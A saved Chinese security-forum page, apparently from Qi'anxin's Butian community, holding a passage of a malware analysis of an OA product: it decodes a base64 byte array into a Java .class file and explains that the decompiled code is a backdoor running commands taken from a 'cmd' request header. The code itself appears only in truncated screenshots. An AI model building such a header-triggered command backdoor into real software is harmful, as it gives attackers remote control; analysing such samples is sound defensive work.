QVscLCwsgV0VPa5XJlZGQUFRVptVpCSCAQOHnyZG
<p blockindex=39><img src=data:image/png;base64,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
<p blockindex=40>在<code>&lt;byte-array&gt;</code>发现了类似于base64编码的内容，我们对其进行解码操作，发现解码之后是一个.class文件</p>
<p blockindex=41><img src="data:image/png;base64,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
<p blockindex=42>接着我们利用反编译工具对该.class文件进行反编译操作，得到如下内容</p>
<p blockindex=43><img src="data:image/png;base64,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
<p blockindex=44>分析：该段代码它包含了一个后门，允许攻击者在请求头中发送一个cmd的参数，代码获取名为<code>cmd</code>的请求头的值，之后根据操作系统类型（Linux或Windows），<code>exec()</code>方法构造不同的命令执行格式。攻击者可以输入一些危险的指令进而获取到对方的一些敏感信息</p></div></div>
 </div>
 <div class="post-opt mt-30">
 <ul class="list-inline text-muted">
 <li>
 <i class="fa fa-clock-o"></i>
 发表于 2024-08-23 09:00:01
 </li>
 <li>阅读 ( 165 )</li>
 <li>分类：<a href=https://forum.butian.net/articles/OA target=_blank rel="noopenner noreferrer">OA产品</a>
 </li>
 <li><a href=# class=report_btn data-source_type=vulnerabilities_article data-source_id=535 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
 </ul>
 </div>
 </div>
 <div class="text-center mt-30 mb-20">
 <button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=article data-source_id=535 data-support_num=1> 1 推荐</button>
 <button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=article data-source_id=535> 收藏</button>
 </div>
 </div>
 
 <div class="widget-answers mt-15">
 <h2 class="h4 post-title">0 条评论</h2>
 <div class=comment>
 </div>
 
 <div class="widget-comment-form row mb-20">
 <form class=col-md-12>
 <div class=form-group>
 <textarea id=comment-content name=content placeholder=写下你的评论 class=form-control value></textarea>
 </div>
 </form>
 <div class="col-md-12 text-right">
 
 <button type=submit data-token=WmNQOk8xxNpddtEgAVMcl2bx5k4GG1wgx7QKrDfh data-source_id=535 data-source_type=article class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
 </div>
 </div>
 
 <div class=text-center>
 
 </div>
 </div>
 </div>
 
 
 </div>
 </div>
</div>
<footer id=footer>
 <div class=container>
 <div class=text-center>
 <a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
 <a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
 <a href=https://forum.butian.net/sitemap>sitemap</a>
 </div>
 <div class="copyright mt-10">
 Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
 </div>
 </div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
 
</div>
 <div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
 
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-535 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
 
</div> 
 
 <div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
 
 </div>
 
 
 
 
 
 
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 